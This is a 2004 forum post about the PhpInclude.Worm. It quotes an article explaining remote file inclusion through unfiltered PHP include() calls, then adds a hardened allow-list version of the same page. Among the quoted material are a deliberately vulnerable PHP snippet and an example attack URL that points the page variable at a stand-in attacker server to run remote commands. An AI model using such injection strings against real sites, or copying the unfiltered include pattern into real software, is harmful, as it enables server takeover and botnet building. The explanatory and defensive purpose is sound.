#1
12-29-2004, 11:56 PM
Mouse
Join Date: Aug 2003
Posts: 1
PHP worm?

I was informed by my host there is a PHP worm out there... do you have an update or is vBulletin already secure for it? I run version 2.3.0.
This is a copy of the email I got... any help would be appreciated.

There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site, ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the following items:

include()
require()
mail()
upload

---------

From the article:

The new worm PhpInclude.Worm is currently propagating on the Internet; it attacks any unprotected dynamic page. [This worm is detected by certain antivirus products as a variant of Santy. We estimate that this worm is completely different from the Santy family, so we decided to give it the generic alias "PhpInclude.Worm".]

Contrary to Santy, PhpInclude.Worm does not exploit the phpBB vulnerabilities; it exploits a broader range of faults known as "programming" faults. It seeks (via Google/Yahoo/AOL) web servers whose PHP pages use the functions "include()" and "require()" in an unprotected way. How?

These functions are normally used by programmers to include web pages specified in their arguments. Unfortunately, not checking these arguments can allow the inclusion and execution of external files, and thus the compromise of the web server:

Example: vulnerable.php
<?php
// Deliberately vulnerable: with register_globals on, $page comes straight
// from the request and is passed to include() without any check.
if (isset($page))
{
    include($page);
}
?>
-----------------------------------------------

The page above does not correctly filter the variable $page; it thus allows the inclusion and then the execution of arbitrary remote scripts:

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm thus seeks pages of the type "*php?*=", then tries to insert various commands there allowing the installation of IRC bots and the building of an army of zombie machines.

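For contrast with the vulnerable.php snippet quoted above, here is an added example (not code from this thread or from vBulletin) of the same page-selection logic written so the request can only pick from a fixed allow-list; the pages/ directory and the page names in it are assumptions.

```php
<?php
// Added example, not from the thread or vBulletin: vulnerable.php's page
// selection rewritten so the request never chooses the file itself.
// Assumption: includable pages live in ./pages/ next to this script.

// The quoted vulnerable pattern, for contrast. With register_globals on
// (common in 2004 installs) $page comes straight from the query string, so
// ?page=http://server_pirate/scriptmalicieux makes PHP 4/5.1 fetch and run
// remote code whenever allow_url_fopen is enabled.
//
//     if (isset($page)) { include($page); }

// Hardening step 1: an allow-list. Untrusted input is only ever used as an
// array key; the path that reaches include() is chosen by the developer.
const PAGE_MAP = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolvePage(?string $requested): string
{
    if ($requested !== null && isset(PAGE_MAP[$requested])) {
        return PAGE_MAP[$requested];
    }
    return PAGE_MAP['home'];   // unknown or missing key: safe default
}

// Hardening step 2: confirm the resolved file really sits below ./pages/,
// so even a mistaken PAGE_MAP entry cannot pull in something else.
function safeIncludePath(string $relative): ?string
{
    $base = realpath(__DIR__ . '/pages');
    $real = realpath(__DIR__ . '/' . $relative);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

$requested = $_GET['page'] ?? null;            // may be absent or an array
$target = safeIncludePath(resolvePage(is_string($requested) ? $requested : null));
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;

// Hardening step 3 lives in php.ini, not here: allow_url_fopen = Off and, on
// PHP 5.2+, allow_url_include = Off, so include() cannot open http:// URLs.
```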